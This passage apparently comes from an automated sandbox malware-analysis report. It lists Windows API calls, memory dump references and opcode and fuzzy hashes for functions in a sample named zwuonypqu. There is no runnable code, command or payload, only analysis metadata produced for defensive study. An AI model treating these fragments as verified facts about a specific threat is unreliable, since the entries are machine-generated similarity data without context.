                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: MessageSend$__itow$_wcslen
                        • String ID:
                        • API String ID: 2875217250-0
                        • Opcode ID: 347b44770508ca88cf5981266e998b528a2978f718c0dd2978777487f2c1d3f7
                        • Instruction ID: b65c482f8247f617b799fd724a7506577ebf884cdb52d0d4602b18db992df379
                        • Opcode Fuzzy Hash: 347b44770508ca88cf5981266e998b528a2978f718c0dd2978777487f2c1d3f7
                        • Instruction Fuzzy Hash: 3A213D7670031067D210BA169C86FAFB794EB94714F08443FFF44AB241EE69E94687EB
                        APIs
                        • _memset.LIBCMT ref: 0040E202
                        • Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E2C7
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: IconNotifyShell__memset
                        • String ID:
                        • API String ID: 928536360-0
                        • Opcode ID: a8f79553875ba5cd412c6e6f6aef719f94b94a7ff7df26053db2d04cf48d3506
                        • Instruction ID: 9c6d99eda8392314e00a4319cd3b9f491a6d528882fc0aac3328a2d60ab56ec1
                        • Opcode Fuzzy Hash: a8f79553875ba5cd412c6e6f6aef719f94b94a7ff7df26053db2d04cf48d3506
                        • Instruction Fuzzy Hash: FC318170608701DFD320DF25D845B97BBF8BB45304F00486EE99A93380E778A958CF5A
                        APIs
                        • GetForegroundWindow.USER32 ref: 00472806
                          • Part of subcall function 00443EEF: GetWindowThreadProcessId.USER32(00000001,00000000), ref: 00443F11
                          • Part of subcall function 00443EEF: GetCurrentThreadId.KERNEL32(00000000), ref: 00443F18
                          • Part of subcall function 00443EEF: AttachThreadInput.USER32(00000000), ref: 00443F1F
                        • GetCaretPos.USER32(?), ref: 0047281A
                        • ClientToScreen.USER32(00000000,?), ref: 00472856
                        • GetForegroundWindow.USER32 ref: 0047285C
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                        • String ID:
                        • API String ID: 2759813231-0
                        • Opcode ID: f08c9821fa495b0e17bd1c697e1e5286648ea95901ecf1a9ceb1535147bec3ee
                        • Instruction ID: 38f02bd9b1f6bed34cfa7ce2d7f69328ba3456287a0ba45db7850a86b8391dd2
                        • Opcode Fuzzy Hash: f08c9821fa495b0e17bd1c697e1e5286648ea95901ecf1a9ceb1535147bec3ee
                        • Instruction Fuzzy Hash: FF2195716403056FE310EF65CC42F5BB7E8AF84708F144D2EF544AB282D6FAB9858795
                        APIs
                          • Part of subcall function 0046DD22: IsWindow.USER32(00000000), ref: 0046DD51
                        • GetWindowLongW.USER32(?,000000EC), ref: 0047728E
                        • SetWindowLongW.USER32(?,000000EC,00000000,?,000000EC,?,00000001,?,?), ref: 004772A9
                        • SetWindowLongW.USER32(?,000000EC,00000000,?,000000EC,?,00000001,?,?), ref: 004772C0
                        • SetLayeredWindowAttributes.USER32 ref: 004772D0
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: Window$Long$AttributesLayered
                        • String ID:
                        • API String ID: 2169480361-0
                        • Opcode ID: cf64f2ba38e7b8586118add57273b6dbf74680437e58013ae8f64db123384f26
                        • Instruction ID: faea1ea985e506ac999786301d765d91882fdca708237d94abe4bce3661c65f1
                        • Opcode Fuzzy Hash: cf64f2ba38e7b8586118add57273b6dbf74680437e58013ae8f64db123384f26
                        • Instruction Fuzzy Hash: 5F11B431205510ABD310FB29DD45F9BB798FF91720F10862EF455E72E2C7A8AC45C7A8
                        APIs
                        • SendMessageW.USER32 ref: 00448CB8
                        • GetWindowLongW.USER32(?,000000EC), ref: 00448CE0
                        • SendMessageW.USER32(?,0000104C,00000000,?), ref: 00448D19
                        • SendMessageW.USER32(?,0000102B,00000000,?), ref: 00448D62
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: MessageSend$LongWindow
                        • String ID:
                        • API String ID: 312131281-0
                        • Opcode ID: 75ae646de43e531ea10203f5aba75cb55710deee3f48b72b110124c921b55059
                        • Instruction ID: 9d6bf2a2f0cb0d5184a29e15ea511504db1ac53b4253ca88fa0f688086887250
                        • Opcode Fuzzy Hash: 75ae646de43e531ea10203f5aba75cb55710deee3f48b72b110124c921b55059
                        • Instruction Fuzzy Hash: B12174715053019BF3208F18D98879FB7E4FBD5325F140B2EF594962D0DBB58449C796
                        APIs
                        • select.WSOCK32 ref: 0045890A
                        • __WSAFDIsSet.WSOCK32(00000000,00000000), ref: 00458919
                        • accept.WSOCK32(00000000,00000000,00000000,00000000,00000000), ref: 00458927
                        • WSAGetLastError.WSOCK32(00000000), ref: 00458952
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: ErrorLastacceptselect
                        • String ID:
                        • API String ID: 385091864-0
                        • Opcode ID: abc1db9f2e63247cad6e2e0496bedee0f0acb9a353b4738024f17ecaf3b799d2
                        • Instruction ID: 93f38c3b8a65fd8a68e5265ae944391143789c71a4918893f245a539b4228a7d
                        • Opcode Fuzzy Hash: abc1db9f2e63247cad6e2e0496bedee0f0acb9a353b4738024f17ecaf3b799d2
                        • Instruction Fuzzy Hash: 1F2166712043019BD314EF29C842BABB7E5AFC4714F144A2EF994DB2C1DBB4A985CB99
                        APIs
                        • SendMessageW.USER32(?,000000B0,?,?), ref: 00438D6F
                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00438D82
                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00438D9A
                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00438DB4
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: MessageSend
                        • String ID:
                        • API String ID: 3850602802-0
                        • Opcode ID: 265964968b448329a9940c71d90cafee1d95b27ec759889be900fe0a368f8aeb
                        • Instruction ID: 707762f1bc06eebb59e9357f9c77b20c0e090dcf7cedc03b298b4f863176c0ea
                        • Opcode Fuzzy Hash: 265964968b448329a9940c71d90cafee1d95b27ec759889be900fe0a368f8aeb
                        • Instruction Fuzzy Hash: 77113AB6204305AFD210EF58DC84F6BF7E8EBE8750F20491EF580D7290D6B1A8468BA1
                        APIs
                        • CreateWindowExW.USER32 ref: 0043367E
                        • GetStockObject.GDI32(00000011), ref: 00433695
                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 0043369F
                        • ShowWindow.USER32(00000000,00000000), ref: 004336BA
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: Window$CreateMessageObjectSendShowStock
                        • String ID:
                        • API String ID: 1358664141-0
                        • Opcode ID: a78582cd8c915fd270119012ff4eddf0033f410814d91724adacf9cac7d73a6b
                        • Instruction ID: 5bb77caae3378c1c36de35f78993aeb7f53e4fc0e9047450929301c31466c70f
                        • Opcode Fuzzy Hash: a78582cd8c915fd270119012ff4eddf0033f410814d91724adacf9cac7d73a6b
                        • Instruction Fuzzy Hash: 60114F72204A00BFD254DF55CC49F5BB3F9AFCCB01F20950DB254922A0D7B4E9418BA9
                        APIs
                        • GetCurrentThreadId.KERNEL32 ref: 004441B8
                        • MessageBoxW.USER32 ref: 004441F6
                        • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0044420C
                        • CloseHandle.KERNEL32(00000000), ref: 00444213
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                        • String ID:
                        • API String ID: 2880819207-0
                        • Opcode ID: 146d2f4ba151d14deb3aa3acfdd6de045567f86e28c98b22242e1e1489ea4094
                        • Instruction ID: a177bb78e812b0c83f085b16f259857c8a511f23e32e5024349264f8b0df3d09
                        • Opcode Fuzzy Hash: 146d2f4ba151d14deb3aa3acfdd6de045567f86e28c98b22242e1e1489ea4094
                        • Instruction Fuzzy Hash: C401E5364183105BD300DB28ED08A9BBBD8BFD9721F18067EF89893351E6B48948C7B6
                        APIs
                        • GetWindowRect.USER32(?,?), ref: 00434037
                        • ScreenToClient.USER32(?,?), ref: 0043405B
                        • ScreenToClient.USER32(?,?), ref: 00434085
                        • InvalidateRect.USER32(?,?,?), ref: 004340A4
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: ClientRectScreen$InvalidateWindow
                        • String ID:
                        • API String ID: 357397906-0
                        • Opcode ID: 751e48bbdad3fa965b56aea51b9fa4e55de6b4169d4940aca7a3583b508516de
                        • Instruction ID: 02545dd0d615a745195cb6f618e51c1f9c2552a202a2369b8695847d2ce6fb2f
                        • Opcode Fuzzy Hash: 751e48bbdad3fa965b56aea51b9fa4e55de6b4169d4940aca7a3583b508516de
                        • Instruction Fuzzy Hash: 24117EB9608302AFC304DF18D98095BBBE9FFD8650F10891EF88993350D770E9498BA2
                        APIs
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                        • String ID:
                        • API String ID: 3016257755-0
                        • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                        • Instruction ID: 11ead64bc5c18606fe5fffcedc2bbdf89ccfa4faa7bd693ca83be0ddd2add3a5
                        • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                        • Instruction Fuzzy Hash: AA11A272500059BBCF225E85EC018EE3F66FB88354B898416FE2858131C73AC9B1AB85
                        APIs
                        • __wsplitpath.LIBCMT ref: 00436A45
                          • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
                        • __wsplitpath.LIBCMT ref: 00436A6C
                        • __wcsicoll.LIBCMT ref: 00436A93
                        • __wcsicoll.LIBCMT ref: 00436AB0
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: __wcsicoll__wsplitpath$__wsplitpath_helper
                        • String ID:
                        • API String ID: 1187119602-0
                        • Opcode ID: 5b78189461bd351535feab14c2aa3b28919a840a222a6c91b90152b853837e7b
                        • Instruction ID: cc447ddabc085245cf6c6bda96777749177fc915bba42f20b5b260b799017f3a
                        • Opcode Fuzzy Hash: 5b78189461bd351535feab14c2aa3b28919a840a222a6c91b90152b853837e7b
                        • Instruction Fuzzy Hash: 690165B64043416BD724EB50D881EEBB3ED7BD8304F04C91EB5C982041FB38D24C87A6
                        APIs
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: _wcslen$_malloc_wcscat_wcscpy
                        • String ID:
                        • API String ID: 1597257046-0
                        • Opcode ID: 0c0987e53d9eaf0ac4f77b471e123d914adc5531ce330670c1094c1433057a44
                        • Instruction ID: 9df5ee2dcc5f1a759a9cde70f7b42babd8a8bdcc369222b22224423102f690bd
                        • Opcode Fuzzy Hash: 0c0987e53d9eaf0ac4f77b471e123d914adc5531ce330670c1094c1433057a44
                        • Instruction Fuzzy Hash: BFF06D32200200AFC314EB66C885E6BB3EAEBC5324F04852EF556C7791DB39F841C764
                        APIs
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: DeleteDestroyObject$IconWindow
                        • String ID:
                        • API String ID: 3349847261-0
                        • Opcode ID: 3ca9d014447a04aedc0dfd8276f5a6e9fbff97cfd7386ed498fa31ba53dce0fe
                        • Instruction ID: 3a9029eb8e47786e7dec82746d504bb216afab776d143f23dce7b1a7602128e4
                        • Opcode Fuzzy Hash: 3ca9d014447a04aedc0dfd8276f5a6e9fbff97cfd7386ed498fa31ba53dce0fe
                        • Instruction Fuzzy Hash: 06F03C702006419BDB20AF65DDD8A2B77ACEF45322740456AFD04D7242DB28DC498B7D
                        APIs
                        • EnterCriticalSection.KERNEL32(?), ref: 0044B60B
                        • InterlockedExchange.KERNEL32(?,?), ref: 0044B619
                        • LeaveCriticalSection.KERNEL32(?), ref: 0044B630
                        • LeaveCriticalSection.KERNEL32(?), ref: 0044B641
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                        • String ID:
                        • API String ID: 2223660684-0
                        • Opcode ID: ff66e887f7cbb15f4500d5b6eb7e85b0bae77af45fe5867796c74117f3ed7197
                        • Instruction ID: 8f2921e390180aa9c6083979f061463a0462abb68b72a76a452ff5fd2bc04521
                        • Opcode Fuzzy Hash: ff66e887f7cbb15f4500d5b6eb7e85b0bae77af45fe5867796c74117f3ed7197
                        • Instruction Fuzzy Hash: 35F08C362422019F82249B59EA488DBB3FDEBE97213009C2FE142C32108BB5F806CB75
                        APIs
                          • Part of subcall function 0044710F: DeleteObject.GDI32(00000000), ref: 00447151
                          • Part of subcall function 0044710F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000), ref: 00447195
                          • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471A2
                          • Part of subcall function 0044710F: BeginPath.GDI32(?), ref: 004471B7
                          • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471DC
                        • MoveToEx.GDI32(?,?,00000000,00000000), ref: 0044728F
                        • LineTo.GDI32(?,00000000,00000002), ref: 004472A0
                        • EndPath.GDI32(?), ref: 004472B0
                        • StrokePath.GDI32(?), ref: 004472BE
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: ObjectPath$Select$BeginCreateDeleteLineMoveStroke
                        • String ID:
                        • API String ID: 2783949968-0
                        • Opcode ID: 09270453bc364e96d12f6c3f9be453f1264e71f62e0889bc66601f12e66ee767
                        • Instruction ID: 15f667079dd022c0076d5117e5ffb33549464faf874781034dcdd6a9c0a79bb3
                        • Opcode Fuzzy Hash: 09270453bc364e96d12f6c3f9be453f1264e71f62e0889bc66601f12e66ee767
                        • Instruction Fuzzy Hash: 46F09030109361BFE211DB10DC0AF9F3B98AB46310F10490CF641622D2C7B46845C7BA
                        APIs
                        • __getptd.LIBCMT ref: 00417D1A
                          • Part of subcall function 00416C72: __getptd_noexit.LIBCMT ref: 00416C75
                          • Part of subcall function 00416C72: __amsg_exit.LIBCMT ref: 00416C82
                        • __getptd.LIBCMT ref: 00417D31
                        • __amsg_exit.LIBCMT ref: 00417D3F
                        • __lock.LIBCMT ref: 00417D4F
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                        • String ID:
                        • API String ID: 3521780317-0
                        • Opcode ID: 6e88b35b2b81098ca19d257f076875e832caf49443e3c23eeee739354b537ff9
                        • Instruction ID: 784cd6646040312d8c3929352b57c791f513dbd9ce30c249d09a92555f0e5bc7
                        • Opcode Fuzzy Hash: 6e88b35b2b81098ca19d257f076875e832caf49443e3c23eeee739354b537ff9
                        • Instruction Fuzzy Hash: D4F06D319447089AD720FB66E4067EA32B0AF01728F11856FA4415B7D2DB3C99C08B9E
                        APIs
                        • GetDesktopWindow.USER32 ref: 00471144
                        • GetDC.USER32(00000000), ref: 0047114D
                        • GetDeviceCaps.GDI32(00000000,00000074), ref: 0047115A
                        • ReleaseDC.USER32(00000000,?), ref: 0047117B
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: CapsDesktopDeviceReleaseWindow
                        • String ID:
                        • API String ID: 2889604237-0
                        • Opcode ID: 949280357db84fa49407f8095e759b2e277f1c53a9819964645a6bf04a6d26c7
                        • Instruction ID: a1da8b046b56c0024f4e51319ca7c868ce9b42ab557c4db2e47d6af70bf9fcef
                        • Opcode Fuzzy Hash: 949280357db84fa49407f8095e759b2e277f1c53a9819964645a6bf04a6d26c7
                        • Instruction Fuzzy Hash: 75F05E759042009FC310DF65DC4856EBBA4FB94351F108C3EFD05D2251DB7889059B99
                        APIs
                        • GetDesktopWindow.USER32 ref: 00471102
                        • GetDC.USER32(00000000), ref: 0047110B
                        • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00471118
                        • ReleaseDC.USER32(00000000,?), ref: 00471139
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: CapsDesktopDeviceReleaseWindow
                        • String ID:
                        • API String ID: 2889604237-0
                        • Opcode ID: 179ddf2500a9669b2282ba4880ad99879b6dd87bde84ab61e923a9eee80713d7
                        • Instruction ID: 5204c471e266b2ed5cdb435334cd6f206910ee07043e0bb223494c3f632f6575
                        • Opcode Fuzzy Hash: 179ddf2500a9669b2282ba4880ad99879b6dd87bde84ab61e923a9eee80713d7
                        • Instruction Fuzzy Hash: 78F05E759042009FD310EF65DC5896EBBA4FB94351F104C3EFC05D2251DB7489059B99
